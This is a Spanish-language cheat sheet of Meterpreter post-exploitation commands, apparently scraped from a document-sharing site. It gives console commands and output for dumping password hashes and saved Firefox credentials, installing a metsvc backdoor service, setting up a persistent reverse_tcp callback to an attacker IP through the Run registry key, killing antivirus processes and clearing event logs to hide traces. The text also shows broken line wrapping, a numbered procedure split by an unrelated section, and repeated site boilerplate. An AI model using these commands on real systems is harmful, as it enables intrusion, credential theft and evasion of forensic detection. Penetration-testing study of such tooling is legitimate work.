Comandos Meterpreter (Utiles)

Comandos Meterpreter
run get_env -> Sirve para obteenr mas informacion del sistema que se infecto
getpid -> Sirve para saber que numero e poceso estamos ocupando
getuid -> Sirve para saber que privilegios tenemos en el sistema
getsystem -> Srive para elevar los privilegios
RUN -> sirve para correr scripts en meterpreter
run checkvm -> Sirve para saber si el equipo atacado es virtual o fisico
run get_application_list ->Sirve para ver la lista de programas instalados en el
pc
run scraper ->Nos permite acceder a los registros de windows y hashes de los usu
arios
run credcollect -> NOs permite obtener los hashes que almacena la base de datosd
le equipo objetivo
run enum_firefox -> Con este script se puede saer si el equipo tiene instalado f
irefox y si es asi
se descargan cookies, contraseas guardadas, historial de navegacin, etc.
Puede ser interesante extraer los datos los usuarios y contraseas all almacenados,
para esto se utiliza del programa FirePassword, el procedimiento es el siguient
e:
1. Descargar el programa (.exec)
2. Navegar desde Meterpreter al directorio donde se ha descargado o se encuentra
almacenado el programa con el uso de los comandos getlwd y lcd (estos comandos
permiten consultar el directorio actual (local) y cambiar la ruta de directorio
actual (local)
metsrv -> Otra forma de mantener el acceso a un objetivo, es por medio del estab
lecimiento de una puerta trasera, es posible definir una puerta trasera por medi
o del uso de la extensin metsvc de meterpreter, de esta forma se puede acceder po
steriormente al cliente sin necesidad de esperar nuevamente a que la maquina com
prometida establezca la conexin.
Una vez obtenida la sesin meterpreter es necesario buscar el proceso explorer, (e
n donde se intentar establecer la puerta trasera) aunque no necesariamente tiene
que ser este proceso en particular ya que se puede ejecutar el comando sobre cua
lquier identificador de proceso valido, se indica el proceso explorer ya que es un
o de los procesos mas importantes del sistema operativo:
meterpreter > ps
Process list============PID Name Arch Session User Path
- - - - 0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
476 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
.
meterpreter > migrate 244
[*] Migrating to 244
[*] Migration completed successfully.
Una vez realizado el proceso de migracin es posible ejecutar el comando

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337[*] Creating a temporary install
ation directory C:\DOCUME~1\Owner\LOCALS~1\Temp\lZBdswMe[*] >> Uploading metsrv.d
ll
[*] >> Uploading metsvc-server.exe
[*] >> Uploading metsvc.exe
[*] Starting the service
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
Si ya existe una puerta trasera instalada es posible eliminarla con la opcin -r.
Ahora que esta establecida la puerta trasera, es posible iniciar en cualquier mo
mento un puente reverso hacia la maquina del atacante de forma automtica, as es p
osible usar el exploit multi/handler que permitir realizar estas acciones, adicio
nalmente, se define un PAYLOAD que realizar la conexin inmediatamente entre las do
s maquinas:
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set RHOST 192.168.1.34
RHOST => 192.168.1.34
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit
[*] Starting the payload handler
[*] Started bind handler
[*] Meterpreter session 4 opened (192.168.1.33:38034 -> 192.168.1.34:31337) at S
un Mar 06 21:53:51 +0100 2011
meterpreter >
NOTA: Aunque se puede eliminar esta puerta trasera, en realidad lo que hace la o
pcin -r es eliminar las entradas en el registro de la maquina remota pero los fic
heros cargados a la misma, NO SE ELIMINAN, por esta razn es importante realizar e
l borrado de las libreras (.dll) y los ficheros ejecutables (.exe) de forma manua
l, para evitar dejar rastros que posiblemente sean fcilmente detectables por un s
oftware de auditoria o un proceso forense, ademas de esto tambin es necesario fin
alizar cualquier proceso que se encuentre en ejecucin y que dependa de dichos fic
heros.
3. Posteriormente hacer uso del comando upload de Meterpreter y subir el fichero
ejecutable a la maquina remota.
4. Ahora ejecutar el comando shell para abrir una consola en el sistema remoto y
ejecutar el programa FirePassword en la maquina remota, con esto, el programa d
ar un listado de las rutas de navegacin empleadas y sus correspondientes credencia
les en texto plano (en el caso de que se encuentren almacenadas en el navegador)
.
winenum -> Se trata de un script que retorna toda la informacin posible sobre el
sistema objetivo, mezclando algunos de los scripts anteriormente mencionado
prefetchtool -> Permite obtener informacin sobre los programas que han sido frecu
entemente utilizados en el sistema comprometido, reportando las fechas de acceso
y creacin de cada uno de los programas encontrados, este script se vale de un ej
ecutable que debe estar incluido en el framework, en el caso de que no se encuen
tre, se intentar descargar de internet automticamente, por lo tanto para uso es ne
cesario tener conexin a internet(si se cuenta con el fichero prefetch.exe en el d
irectorio de metasploit) este fichero es instalado en el directorio <msf_install
_directory>/data/prefetch.exe
getcountermeasure -> Este script permite obtener informacin sobre los sistemas de
seguridad implementados en el objetivo, tales como AV y reglas de Firewall, y s
i es posible intenta matar el proceso.
clearev ->Se trata de una utilidad muy interesante que permite eliminar todos lo
s log registrados en los ficheros de eventos de la maquina comprometida, de esta
forma es posible ocultar las trazas de las acciones llevadas a cabo y que muy p
robablemente han quedado monitorizadas.
En un sistema basado en Windows, la herramienta para ver los log se encuentra ub
icada en Configuracin Herramientas Administrativas Event Viewer
persistence ->Una vez explotado un sistema, una puerta persistente que nos permi
ta conectarnos en cualquier momento a nuestro objetivo sin necesidad de explotar
lo nuevamente es algo deseable, para realizar esta tarea existen algunas otras f
ormas que implican la modificacin del registro de windows de forma manual, en est
e caso vamos a hacer uso de uno de los payloads que existen en una sesin meterpre
ter para instalar el servicio.
Nota: No especificamos ningn valor para autenticacin, lo que significa que cualqui
er usuario en la maquina remota, eventualmente intentara realizar una conexin a l
a puerta trasera, esto puede ser un riesgo de seguridad alto, por lo tanto se re
comienda tener precaucin y limpiar cualquier registro (huella) una vez se ha term
inado de realizar las tareas correspondientes.
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.OPTIONS:A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will
be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu

-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.33
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf3/logs/persistence/OWNER_2011
0307.1848/OWNER_20110307.1848.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=44
44
[*] Persistent agent script is 610514 bytes long
[+] Persisten Script written to C:\WINDOWS\TEMP\cJYeLTeHhKhX.vbs
[*] Executing script C:\WINDOWS\TEMP\cJYeLTeHhKhX.vbs
[+] Agent executed with PID 2840
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Ru
n\DfctDISwu
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run
\DfctDISwu
Ahora se puede reiniciar la maquina comprometida, con el fin de iniciar el proce
so recin creado, esto se puede hacer con el comando reboot y una vez el usuario i
nicie sesin nuevamente, se iniciar la conexin hacia la maquina del atacante, por lo
tanto, dicha maquina debe tener el exploit preparado con un PAYLOAD adecuado, t
al como reverse_tcp, reverse_http, reverse_https o metsvc_bind_tcp

Comandos Meterpreter (Utiles)

Cargado por

Copyright:

Formatos disponibles

Comandos Meterpreter (Utiles)

Cargado por

Información del documento

Título original

Derechos de autor

Formatos disponibles

Compartir este documento

Compartir o incrustar documentos

Opciones para compartir

¿Le pareció útil este documento?

¿Este contenido es inapropiado?

Copyright:

Formatos disponibles

Comandos Meterpreter (Utiles)

Cargado por

Copyright:

Formatos disponibles

Comandos Meterpreter

Una vez realizado el proceso de migracin es posible ejecutar el comando

-h This help menu

También podría gustarte